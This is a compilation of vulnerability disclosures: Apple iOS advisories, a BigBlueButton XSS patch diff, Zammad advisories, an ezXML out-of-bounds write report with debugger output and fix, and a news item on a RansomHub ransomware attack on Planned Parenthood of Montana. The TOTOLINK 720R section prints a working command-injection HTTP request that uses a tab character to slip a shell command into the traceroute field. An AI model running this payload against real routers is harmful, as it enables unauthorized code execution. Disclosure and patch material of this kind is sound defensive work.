Apple Security Advisory 11-19-2024-3 - iOS 18.1.1 and iPadOS 18.1.1 addresses code execution vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1iOS 18.1.1 and iPadOS 18.1.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/121752.Apple maintains a Security Releases page athttps://support.apple.com/100100 which lists recentsoftware updates with security advisories.JavaScriptCoreAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Processing maliciously crafted web content may lead to arbitrarycode execution. Apple is aware of a report that this issue may have beenactively exploited on Intel-based Mac systems.Description: The issue was addressed with improved checks.WebKit Bugzilla: 283063CVE-2024-44308: Clément Lecigne and Benoît Sevens of Google's ThreatAnalysis GroupWebKitAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Processing maliciously crafted web content may lead to a crosssite scripting attack. Apple is aware of a report that this issue mayhave been actively exploited on Intel-based Mac systems.Description: A cookie management issue was addressed with improved statemanagement.WebKit Bugzilla: 283095CVE-2024-44309: Clément Lecigne and Benoît Sevens of Google's ThreatAnalysis GroupThis update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/iTunes and Software Update on the device will automatically checkApple's update server on its weekly schedule. When an update isdetected, it is downloaded and the option to be installed ispresented to the user when the iOS device is docked. We recommendapplying the update immediately if possible. SelectingDon't Install will present the option the next time you connectyour iOS device.The automatic update process may take up to a week depending onthe day that iTunes or the device checks for updates. You maymanually obtain the update via the Check for Updates buttonwithin iTunes, or the Software Update on your device.To check that the iPhone, iPod touch, or iPad has been updated:* Navigate to Settings* Select General* Select About. The version after applying this update will be"iOS 18.1.1 and iPadOS 18.1.1".All information is also posted on the Apple Security Releasesweb site: https://support.apple.com/100100.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmc9JA8ACgkQX+5d1TXaIvrGzw/+PXf2fGgzCN5of6OYK0sWiJRRLZoL0uSZ9dOaD7I0/CyAx91Mv4OyH9Vveo9k84ZABNk4IO401WWLM8XSRSVILTcskT+SdXZrtOMYvmtUHUPKI35OWf1GBFdkgfnnFSRYf/B+WWb4PV0iO01lyFQVU5qDLcrUCAUQLwighfAX2yEn+Zml3NX6i2E5o2Rhc93Nac5a2cIcOGOSKrwsor0sh8NkAl9DcyPW6i6K3t59lUjiUY9XZQtEi6AyrChA84mo6Hb8wLwVIY17b8LVuruOSn3xg+Cc5eO5bOXp1O5lnR3dhuiZ2bl5BKawrp8+MDRsBZuTPS0k2Di3rmzuZ/GnvaQdtQKhcbOQ7tWW6evk/8TnFwlULaCr26OVbuLj0NWJ7GJYWpPuRWO0lFy9z9Fjdk4n+ptA7qmSWrhbdl+/uwUxJA5X58pVRWeWBExGP3S/ST/5YgAfZXBjHuDLiHKMOtQ3PktaMuEWhLFgGXNllXGQDihL4lS/XUQ1/E+mpWyY+kAbjtmCYlpez5MgeLkVv66yEWhOhsBMNIM+jkkRjktJo2SfhJMSryNLQlY37zn/VWf8Av+L60YoZhoMmx7DJLIr+HI257zbIE35CVZ+badn18d3eA+fq3RPtsDD8nlUePyZeNhEvc30Y5hXsIyK+Z0Ny+JgJfP1E6BeAJjjci0==ifwz-----END PGP SIGNATURE-----

Apple Security Advisory 11-19-2024-3

Apple Security Advisory 11-19-2024-4 - iOS 17.7.2 and iPadOS 17.7.2 addresses code execution vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2iOS 17.7.2 and iPadOS 17.7.2 addresses the following issues.Information about the security content is also available athttps://support.apple.com/121754.Apple maintains a Security Releases page athttps://support.apple.com/100100 which lists recentsoftware updates with security advisories.JavaScriptCoreAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Processing maliciously crafted web content may lead to arbitrarycode execution. Apple is aware of a report that this issue may have beenactively exploited on Intel-based Mac systems.Description: The issue was addressed with improved checks.WebKit Bugzilla: 283063CVE-2024-44308: Clément Lecigne and Benoît Sevens of Google's ThreatAnalysis GroupWebKitAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Processing maliciously crafted web content may lead to a crosssite scripting attack. Apple is aware of a report that this issue mayhave been actively exploited on Intel-based Mac systems.Description: A cookie management issue was addressed with improved statemanagement.WebKit Bugzilla: 283095CVE-2024-44309: Clément Lecigne and Benoît Sevens of Google's ThreatAnalysis GroupThis update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/iTunes and Software Update on the device will automatically checkApple's update server on its weekly schedule. When an update isdetected, it is downloaded and the option to be installed ispresented to the user when the iOS device is docked. We recommendapplying the update immediately if possible. SelectingDon't Install will present the option the next time you connectyour iOS device.The automatic update process may take up to a week depending onthe day that iTunes or the device checks for updates. You maymanually obtain the update via the Check for Updates buttonwithin iTunes, or the Software Update on your device.To check that the iPhone, iPod touch, or iPad has been updated:* Navigate to Settings* Select General* Select About. The version after applying this update will be"iOS 17.7.2 and iPadOS 17.7.2".All information is also posted on the Apple Security Releasesweb site: https://support.apple.com/100100.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmc9JGcACgkQX+5d1TXaIvqaMhAArOKmA61hgLNGofjznuKQo6Jc42iPl7a/ZiB2Tq5ynZKPIGmGiM3HdJQ8bbifOgpkmNcA3h1OUlXnnkbdehq6d8MzI9WSn6uHdgWZ5LqLMXOWgsEF5Hwwmm7zaqTaqMv4fV2J6w2wTcoL5XptxGXiEi37/GzcureD3hvL+nRAAzR6c/gRXmcEjGL7pVTNJA0C8VyY9kG+Uc7ia2m5Riux2jsYzWYppPfCwUFeo3bQDexG7WsiHa00OZN+HkNS5/1t/7hftJZ+w/PbVnEK23Dm962NQgCrcFKGnbjNGJQlIjl+xfbi6BuQ6lJJZAI+3WqPHXLAMCcae/DfERqXWnJu8fTMfCwCbQVx185Cih+mtH0oc4MtPtiZdhi8TxZpVGZHYjLJa9VANTrNzkAmFflnhAC4tAG2FXx3ld3t/8u9Fhv0oyTa5HlzVYJ/WJgK32eT7I1h7Oqrp49KZcMIM8H6ZwNXYOI+Rf7GXdEN2y9Qhb+IOvdilTrCTpzRl6Gu6fBwH0G0UGHRktnBPlryJdOg26J1iVBZg6/K/CSjQizWdDXN/Nq4YwI17Eq4HtFdtOtrs5n0bDz+fsfGbsieTyUz1BUet2xLzPECfD4nYEKmckD1d/dRylc3vK9YGOCp1nWDoPSKnmkU9Il2SFAIuEM9o60lCN7PMWBrC9zYXMAxFmY==+VKC-----END PGP SIGNATURE-----

Apple Security Advisory 11-19-2024-4

BigBlueButton is an open-source virtual classroom. Prior to versions 2.6.11 and 2.7.0-beta.3, Guest Lobby was vulnerable to cross-site scripting when users wait to enter the meeting due to inserting unsanitized messages to the element using unsafe innerHTML. Text sanitizing was added for lobby messages starting in versions 2.6.11 and 2.7.0-beta.3. There are no known workarounds.

25 changes: 25 additions & 0 deletions bigbluebutton-html5/imports/api/common/server/helpers.js

@@ -1,9 +1,34 @@

import Users from '/imports/api/users';

import Logger from '/imports/startup/server/logger';

import RegexWebUrl from '/imports/utils/regex-weburl';

 

const MSG\_DIRECT\_TYPE \= 'DIRECT';

const NODE\_USER \= 'nodeJSapp';

 

const HTML\_SAFE\_MAP \= {

'<': '&lt;',

'>': '&gt;',

'"': '&quot;',

"'": '&#39;',

};

 

export const parseMessage \= (message) \=> {

let parsedMessage \= message || '';

parsedMessage \= parsedMessage.trim();

 

// Replace with \\n\\r

parsedMessage \= parsedMessage.replace(/<br\\s\*\[\\\\/\]?>/gi, '\\n\\r');

 

// Sanitize. See: http://shebang.brandonmintern.com/foolproof-html-escaping-in-javascript/

parsedMessage \= parsedMessage.replace(/\[<>'"\]/g, (c) \=> HTML\_SAFE\_MAP\[c\]);

 

// Replace flash links to flash valid ones

parsedMessage \= parsedMessage.replace(RegexWebUrl, "<a href='event:$&'>$&</a>");

 

return parsedMessage;

};

 

 

export const spokeTimeoutHandles \= {};

export const clearSpokeTimeout \= (meetingId, userId) \=> {

if (spokeTimeoutHandles\[\`${meetingId}\-${userId}\`\]) {

Expand Down

@@ -1,32 +1,9 @@

import { Meteor } from 'meteor/meteor';

import { check } from 'meteor/check';

import RedisPubSub from '/imports/startup/server/redis';

import RegexWebUrl from '/imports/utils/regex-weburl';

import { extractCredentials } from '/imports/api/common/server/helpers';

import Logger from '/imports/startup/server/logger';

 

const HTML\_SAFE\_MAP \= {

'<': '&lt;',

'>': '&gt;',

'"': '&quot;',

"'": '&#39;',

};

 

const parseMessage \= (message) \=> {

let parsedMessage \= message || '';

parsedMessage \= parsedMessage.trim();

 

// Replace with \\n\\r

parsedMessage \= parsedMessage.replace(/<br\\s\*\[\\\\/\]?>/gi, '\\n\\r');

 

// Sanitize. See: http://shebang.brandonmintern.com/foolproof-html-escaping-in-javascript/

parsedMessage \= parsedMessage.replace(/\[<>'"\]/g, (c) \=> HTML\_SAFE\_MAP\[c\]);

 

// Replace flash links to flash valid ones

parsedMessage \= parsedMessage.replace(RegexWebUrl, "<a href='event:$&'>$&</a>");

 

return parsedMessage;

};

import { extractCredentials, parseMessage } from '/imports/api/common/server/helpers';

import Logger from '/imports/startup/server/logger';

 

export default function sendGroupChatMsg(chatId, message) {

const REDIS\_CONFIG \= Meteor.settings.private.redis;

Expand Down

Expand Up

@@ -2,7 +2,7 @@ import { GroupChatMsg } from '/imports/api/group-chat-msg';

import GroupChat from '/imports/api/group-chat';

import Logger from '/imports/startup/server/logger';

import flat from 'flat';

import { parseMessage } from './addGroupChatMsg';

import { parseMessage } from '/imports/api/common/server/helpers';

 

export default async function addBulkGroupChatMsgs(msgs) {

if (!msgs.length) return;

Expand Down

Expand Up

@@ -2,7 +2,7 @@ import { Meteor } from 'meteor/meteor';

import { check } from 'meteor/check';

import RedisPubSub from '/imports/startup/server/redis';

import Logger from '/imports/startup/server/logger';

import { extractCredentials } from '/imports/api/common/server/helpers';

import { extractCredentials, parseMessage } from '/imports/api/common/server/helpers';

 

const REDIS\_CONFIG \= Meteor.settings.private.redis;

const CHANNEL \= REDIS\_CONFIG.channels.toAkkaApps;

Expand All

@@ -16,8 +16,7 @@ export default function setGuestLobbyMessage(message) {

 

check(meetingId, String);

check(requesterUserId, String);

 

const payload \= { message };

const payload \= { message: parseMessage(message) };

 

Logger.info(\`User=${requesterUserId} set guest lobby message to ${message}\`);

 

Expand Down

Expand Up

@@ -2,7 +2,8 @@ import { Meteor } from 'meteor/meteor';

import { check } from 'meteor/check';

import RedisPubSub from '/imports/startup/server/redis';

import Logger from '/imports/startup/server/logger';

import { extractCredentials } from '/imports/api/common/server/helpers';

import { extractCredentials, parseMessage } from '/imports/api/common/server/helpers';

 

 

const REDIS\_CONFIG \= Meteor.settings.private.redis;

const CHANNEL \= REDIS\_CONFIG.channels.toAkkaApps;

Expand All

@@ -17,7 +18,7 @@ export default function setPrivateGuestLobbyMessage(message, guestId) {

check(meetingId, String);

check(requesterUserId, String);

 

const payload \= { guestId, message };

const payload \= { guestId, message: parseMessage(message) };

 

Logger.info(\`User=${requesterUserId} sent a private guest lobby message to guest user=${guestId}\`);

 

Expand Down

**0 comments on commit 304bc85**

Please sign in to comment.

CVE-2023-43797: Merge pull request from GHSA-v6wg-q866-h73x · bigbluebutton/bigbluebutton@304bc85

SWFTools commit 772e55a2 was discovered to contain a stack overflow via __sanitizer::StackDepotNode::hash(__sanitizer::StackTrace const&) at /sanitizer_common/sanitizer_stackdepot.cpp.

CVE-2022-35111: bug report swftools-pdf2swf · Issue #184 · matthiaskramm/swftools

A lack of password length restriction in Zammad v5.1.0 allows for the creation of extremely long passwords which can cause a Denial of Service (DoS) during password verification.

Security Advisory

April 20, 2022 · Please read carefully and check if the version of your Zammad system is affected by this vulnerability. Please send us information regarding vulnerabilities in Zammad!

**Security Advisory Details**

*   ID: ZAA-2022-03
*   Date: 04/20/2022
*   Title: Denial Of Service
*   Severity: low
*   Product: Zammad 5.1.x
*   Fixed in: Zammad 5.1.1
*   References:  
    \--> pending CVE assignment

**Vulnerability Descriptions****Denial Of Service**

Due to a missing length restriction it was possible to configure extremely long user passwords which may cause denial of service on the Zammad server during password verification.

Special 🙏 and 🤘 and ❤️ to:

*   N: Arslan Kabeer
*   W: https://www.linkedin.com/in/marslankabeer/

**Recommended Resolution**

This vulnerability is fixed in the latest versions of Zammad and it is recommended to upgrade to one of these.

Fixed releases can be found at:

*   https://zammad.org/
*   https://ftp.zammad.com/  
    Or just update your Zammad if installed via OS package manager.

**Additional information**

Online version of this advisory: https://zammad.com/en/advisories/zaa-2022-03

Send all remarks on security issues to security@zammad.com.

CVE-2022-29700: Security Advisory ZAA-2022-03 | Zammad

Zammad 5.2.0 suffers from Incorrect Access Control. Zammad did not correctly perform authorization on certain attachment endpoints. This could be abused by an unauthenticated attacker to gain access to attachments, such as emails or attached files.

Security Advisory

5\. Juli 2022 · Please read carefully and check if the version of your Zammad system is affected by this vulnerability. Please send us information regarding vulnerabilities in Zammad!

**Security Advisory Details**

*   ID: ZAA-2022-08
*   Date: 07/05/2022
*   Title: Unauthorized Access
*   Severity: high
*   Product: Zammad 5.2.x
*   Fixed in: Zammad 5.2.1
*   References:  
    \--> pending CVE assignment

**Vulnerability Descriptions****Unauthorized Access**

Zammad did not correctly perform authorization on certain attachment endpoints. This could be abused by an unauthenticated attacker to gain access to attachments, such as emails or attached files.

Special 🙏 and 🤘 and ❤️ to:

*   N: Erik Kipka, Wilfried Kirsch
*   C: softScheck GmbH
*   W: www.softScheck.com

**Recommended Resolution**

This vulnerability is fixed in the latest versions of Zammad and it is recommended to upgrade to one of these.

Fixed releases can be found at:

*   https://zammad.org/
*   https://ftp.zammad.com/

Or just update your Zammad if installed via OS package manager.

**Additional information**

Online version of this advisory: https://zammad.com/en/advisories/zaa-2022-08

Send all remarks on security issues to security@zammad.com.

CVE-2022-35487: Security Advisory ZAA-2022-08 | Zammad

Insufficient privilege verification in Zammad v5.3.0 allows an authenticated attacker to perform changes on the tags of their customer tickets using the Zammad API. This is now corrected in v5.3.1 so that only agents with write permissions may change ticket tags.

Security Advisory

21\. September 2022 · Please read carefully and check if the version of your Zammad system is affected by this vulnerability. Please send us information regarding vulnerabilities in Zammad!

**Security Advisory Details**

*   ID: ZAA-2022-12
*   Date: 2022-12-21
*   Title: Incorrect Access Control
*   Severity: low
*   Product: Zammad 5.3.x
*   Fixed in: Zammad 5.3.1
*   References:  
    \--> pending CVE assignment

**Vulnerability Descriptions****Incorrect Access Control**

Due to insufficient privilege verification, an authenticated attacker could perform changes on the tags of their customer tickets using the Zammad API. This is now corrected so that only agents with write permission may change ticket tags.

**Recommended Resolution**

This vulnerability is fixed in the latest versions of Zammad and it is recommended to upgrade to one of these.

Fixed releases can be found at:

*   https://zammad.org/
*   https://ftp.zammad.com/

Or just update your Zammad if installed via OS package manager.

**Additional information**

Online version of this advisory: https://zammad.com/en/advisories/zaa-2022-12

Please send remarks on security issues exclusively to security@zammad.com.

CVE-2022-48023: Security Advisory ZAA-2022-12 | Zammad

TOTOLINK-720R v4.1.5cu.374 was discovered to contain a remote code execution (RCE) vulnerability via the setTracerouteCfg function.

**Exploit Title:**Totolink 720 has a code execution vulnerability  
**Version:**V4.1.5cu.374  
**Date:**2022/08/16  
**Exploit Author:**xiaohu816  
**Vendor Homepage:**https://www.totolink.net/

**POC:**  
After the administrator logs in, enter the "system tools" - > "route tracking" page to execute the command  
Execute TLS > / TMP / 2.txt

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 58
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/advance/traceroute.html?time=1659892330160
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: SESSION_ID=2:1591951611:2
    Connection: close
    
    {"command":"aaaa\tls>/tmp/2.txt","num":"4","topicurl":"setTracerouteCfg"} 
    

**Analysis Report:**  
In the processing function of setting the routing parameters of the router, the input IP address is simply checked and then written into V6 through sprintf, and then the system is called for execution  
  
You can bypass the check by \\ t to realize command injection

CVE-2022-38535: TOTOLINK-720R/totolink 720 RCode Execution2.md at 177ee39a5a8557a6bd19586731b0e624548b67ee · Jfox816/TOTOLINK-720R

An issue was discovered in libezxml.a in ezXML 0.8.6. The function ezxml_internal_dtd() performs incorrect memory handling while parsing crafted XML files, which leads to an out-of-bounds write of a one byte constant.

* Summary
* Files
* Reviews
* Support
* Wiki
* Tickets ▾
 * Bugs
 * Support Requests
 * Patches
 * Feature Requests
* Discussion
* Donate

Menu ▾ ▴

Status: open

Owner: nobody

Labels: None

Priority: 5

Updated: 2021-10-25

Created: 2021-04-15

Private: No

**Description**

Function ezxml_internal_dtd() performs incorrect memory handling while parsing crafted XML files which leads to an out-of-bounds write of a one byte constant.

This leads to a crash because the write attempts to write past the mmap()'ed memory region used for reading the crafted XML file in case EZXML_NOMMAP is not set. Memory mapping occurs in ezxml_parse_fd():

#ifndef EZXML\_NOMMAP
 l \= (st.st\_size + sysconf(\_SC\_PAGESIZE) \- 1) & ~(sysconf(\_SC\_PAGESIZE) \-1);
 if ((m \= mmap(NULL, l, PROT\_READ | PROT\_WRITE, MAP\_PRIVATE, fd, 0)) !=
 MAP\_FAILED) {
 madvise(m, l, MADV\_SEQUENTIAL); // optimize for sequential access
 root \= (ezxml\_root\_t)ezxml\_parse\_str(m, st.st\_size);
 madvise(m, root\->len \= l, MADV\_NORMAL); // put it back to normal
 }
 else { // mmap failed, read file into memory
#endif // EZXML\_NOMMAP

The invalid write occurs in case the call to strcspn(n, EZXML_WS) in the code below does not find any whitespace characters (defined in EZXML_WS) in n. Then the length of the string n is returned. Note that n is just a pointer to the original string s. Thus the addition n + strcspn(...) points the first byte after s.

else if (! strncmp(s, "<!ENTITY", 8)) { // parse entity definitions
 c \= s += strspn(s + 8, EZXML\_WS) + 8; // skip white space separator
 n \= s + strspn(s, EZXML\_WS "%"); // find name
 \*(s \= n + strcspn(n, EZXML\_WS)) \= ';'; // append ; to name

MITRE assigned **CVE-2021-31229** for this issue.

**Debugging Output**

$ gdb ~/tmp/ezxml/ezxml\_test CVE-2021-31229-OOBW-000.sample
>>> r
Program received signal SIGSEGV, Segmentation fault.
0x0000555555556698 in ezxml\_internal\_dtd (root\=root@entry\=0x55555555d2a0, s\=0x7ffff7fc6000 <error: Cannot access memory at address 0x7ffff7fc6000>, s@entry\=0x7ffff7fc321e "YO>\]PE\\377V\[ENT<!ATTLISTAY0", len\=len@entry\=24) at ezxml.c:333
333 \*(s \= n + strcspn(n, EZXML\_WS)) \= ';'; // append ; to name

Assembly
 0x0000555555556680 4c 8d 7c 05 00 ezxml\_internal\_dtd+192 lea 0x0(%rbp,%rax,1),%r15
 0x0000555555556685 4c 89 ff ezxml\_internal\_dtd+197 mov %r15,%rdi
 0x0000555555556688 e8 83 ea ff ff ezxml\_internal\_dtd+200 call 0x555555555110 <strcspn@plt>
 0x000055555555668d 48 8d 35 a6 39 00 00 ezxml\_internal\_dtd+205 lea 0x39a6(%rip),%rsi \# 0x55555555a03a
 0x0000555555556694 4d 8d 34 07 ezxml\_internal\_dtd+212 lea (%r15,%rax,1),%r14
>0x0000555555556698 41 c6 06 3b ezxml\_internal\_dtd+216 movb $0x3b,(%r14)
 0x000055555555669c 49 8d 7e 01 ezxml\_internal\_dtd+220 lea 0x1(%r14),%rdi
 0x00005555555566a0 e8 5b ea ff ff ezxml\_internal\_dtd+224 call 0x555555555100 <strspn@plt>
 0x00005555555566a5 4d 8d 4c 06 01 ezxml\_internal\_dtd+229 lea 0x1(%r14,%rax,1),%r9
 0x00005555555566aa 45 0f b6 21 ezxml\_internal\_dtd+234 movzbl (%r9),%r12d

>>> i r
rax 0x1bd 445
rbx 0x0 0
rcx 0x0 0
rdx 0x0 0
rsi 0x55555555a03a 93824992256058
rdi 0x7ffff7fc5e43 140737353899587
rbp 0x7ffff7fc5e43 0x7ffff7fc5e43
rsp 0x7fffffffd810 0x7fffffffd810
r8 0x55555555a030 93824992256048
r9 0x7ffff7fc6000 140737353900032
r10 0xfffffffffffff90a -1782
r11 0x7ffff7e3ac40 140737352281152
r12 0x7ffff7fc5e3b 140737353899579
r13 0x7ffff7fc5def 140737353899503
r14 0x7ffff7fc6000 140737353900032
r15 0x7ffff7fc5e43 140737353899587
rip 0x555555556698 0x555555556698 <ezxml\_internal\_dtd+216>
eflags 0x10216 \[ PF AF IF RF \]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0

>>> bt
#0 0x0000555555556698 in ezxml\_internal\_dtd (root=root@entry=0x55555555d2a0, s=0x7ffff7fc6000 <error: Cannot access memory at address 0x7ffff7fc6000>, s@entry=0x7ffff7fc321e "YO>\]PE\\377V\[ENT<!ATTLISTAY0", len=len@entry=24) at ezxml.c:333
#1 0x00005555555588d1 in ezxml\_parse\_str (s=<optimized out>, s@entry=0x7ffff7fc3000 "<?xdl", len=<optimized out>) at ezxml.c:576
#2 0x0000555555558b59 in ezxml\_parse\_fd (fd=fd@entry=3) at ezxml.c:641
#3 0x0000555555558bfb in ezxml\_parse\_file (file=<optimized out>) at ezxml.c:659
#4 0x000055555555526a in main (argc=<optimized out>, argv=<optimized out>) at ezxml.c:1008

>>> p s
$1 \= 0x7ffff7fc6000 <error: Cannot access memory at address 0x7ffff7fc6000>

>>> p (int) strlen(s)
$2 \= 0

>>> p c
$3 \= 0x7ffff7fc5e43 "<!D>\]PE\\377V\[ENT<!ATTLISTAY0\]><!DO>N<!>N<!\]><!\]>N<7\]><#\]><ml?>N<!D~><!;O><7\]><YO>Y><!D\]><!O>\]?ANY<\]><!><!\]><!l?>N<\]\]><!DO>?>N<><!D\]><!O>\]?ANY<\]><!><!\]><!l?>N<\]\]><!DO>?>N<7\]><#\]><A\]>;DOT7\]><!DOCTYPTYO>Y<!"...
>>> p n
$4 \= 0x7ffff7fc5e43 "<!D>\]PE\\377V\[ENT<!ATTLISTAY0\]><!DO>N<!>N<!\]><!\]>N<7\]><#\]><ml?>N<!D~><!;O><7\]><YO>Y><!D\]><!O>\]?ANY<\]><!><!\]><!l?>N<\]\]><!DO>?>N<><!D\]><!O>\]?ANY<\]><!><!\]><!l?>N<\]\]><!DO>?>N<7\]><#\]><A\]>;DOT7\]><!DOCTYPTYO>Y<!"...

>>> up
#1 0x00005555555588d1 in ezxml\_parse\_str (s=<optimized out>, s@entry=0x7ffff7fc3000 "<?xdl", len=<optimized out>) at ezxml.c:576
576 if (l && ! ezxml\_internal\_dtd(root, d, s++ - d)) return &root->xml;

>>> up
#2 0x0000555555558b59 in ezxml\_parse\_fd (fd=fd@entry=3) at ezxml.c:641
641 root \= (ezxml\_root\_t)ezxml\_parse\_str(m, st.st\_size);

>>> p m
$5 \= (void \*) 0x7ffff7fc3000 // start of mmap()ed memory region

>>> p m + st.st\_size
$6 \= (void \*) 0x7ffff7fc6000

**Reproduction**

$ cd ~/tmp/ezxml
$ gcc -Wall -O2 -DEZXML\_TEST -g -ggdb -o ezxml\_test ezxml.c
$ gdb ~/tmp/ezxml/ezxml\_test CVE-2021-31229-OOBW-000.sample

**Patch**

\--- ezxml.c 2006-06-08 04:33:38.000000000 +0200
+++ ezxml-fixed.c 2021-04-15 15:40:38.054755080 +0200
@@ -320,6 +320,7 @@
 {
 char q, \*c, \*t, \*n = NULL, \*v, \*\*ent, \*\*pe;
 int i, j;
\+ size\_t n\_len, n\_off;

 pe = memcpy(malloc(sizeof(EZXML\_NIL)), EZXML\_NIL, sizeof(EZXML\_NIL));

@@ -330,7 +331,13 @@
 else if (! strncmp(s, "<!ENTITY", 8)) { // parse entity definitions
 c = s += strspn(s + 8, EZXML\_WS) + 8; // skip white space separator
 n = s + strspn(s, EZXML\_WS "%"); // find name
\- \*(s = n + strcspn(n, EZXML\_WS)) = ';'; // append ; to name
\+ n\_len = strlen(n);
\+ n\_off = strcspn(n, EZXML\_WS);
\+ if(n\_off >= n\_len) {
\+ ezxml\_err(root, t, "write past buffer (<!ENTITY)");
\+ break;
\+ }
\+ \*(s = n + n\_off) = ';'; // append ; to name

 v = s + strspn(s + 1, EZXML\_WS) + 1; // find value
 if ((q = \*(v++)) != '"' && q != '\\'') { // skip externals

**Files**

* CVE-2021-31229-OOBW-000.sample (Crash sample)
* CVE-2021-31229-OOBW-000.patch (Patch adding size check)

**2 Attachments**

**Discussion**

Log in to post a comment.

CVE-2021-31229: ezXML / Bugs / #26 Out-of-bounds write in ezxml_internal_dtd()

Intermountain Planned Parenthood of Montana suffered a cyberattack which has been claimed by a ransomware group

In late August, Intermountain Planned Parenthood of Montana suffered a cyberattack which is still under investigation. The attack has been claimed by a ransomware group.

Intermountain Planned Parenthood Inc., doing business as Planned Parenthood Of Montana, is a nonprofit organization that provides sexual health care services. It is not yet known whether any personal information about patients might have been stolen, but that could potentially be devastating.

The patients who rely on Planned Parenthood for care are frequently low-income and face health care disparities due to race, gender, sexuality, or because they live in underserved areas. Sometimes they are minors that have been in contact with the criminal justice system, and they are not eligible for insurance or depend on Medicaid Expansion for coverage.

The group behind the attack, Ransomhub, has claimed responsibility on their leak site where they threaten to publish stolen data to increase the leverage over their victims.

Planned Parenthood listed on RansomHub’s leak site

> “Intermountain Planned Parenthood, a leading nonprofit organization, is dedicated to empowering individuals in Montana to make informed decisions regarding their sexual and reproductive health.”

The listing on the leak site shows financial information, court papers, and insurance certificates. Ransomhub set a timer for Planned Parenthood. The timer counts to September 11 before the release of all the data.

Timer before release of the data

Ransomhub listed the size of the data set at 93 GB, but ransomware groups have been known to exaggerate, lie, and mislead. They are criminals after all.

As laid out in a recent joint advisory by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Department of Health and Human Services (HHS),  RansomHub is a relatively new but very active Ransomware-as-a-Service group known to target healthcare organizations and other critical infrastructure sectors.

According to a recent ThreatDown ransomware report, healthcare and education are the hardest hit sector after “Services” in the US, accounting for 60% and 71% of global attacks in these sectors, respectively.

And in the ThreatDown Ransomware Review of August 2024 we can see that Ransomhub was the gang responsible for the largest number of known attacks in July.

This story will be updated once we find out more about the nature of the stolen data.

****Protecting yourself after a data breach****

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

If you want to find out what personal data of yours has been exposed online, you can use our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us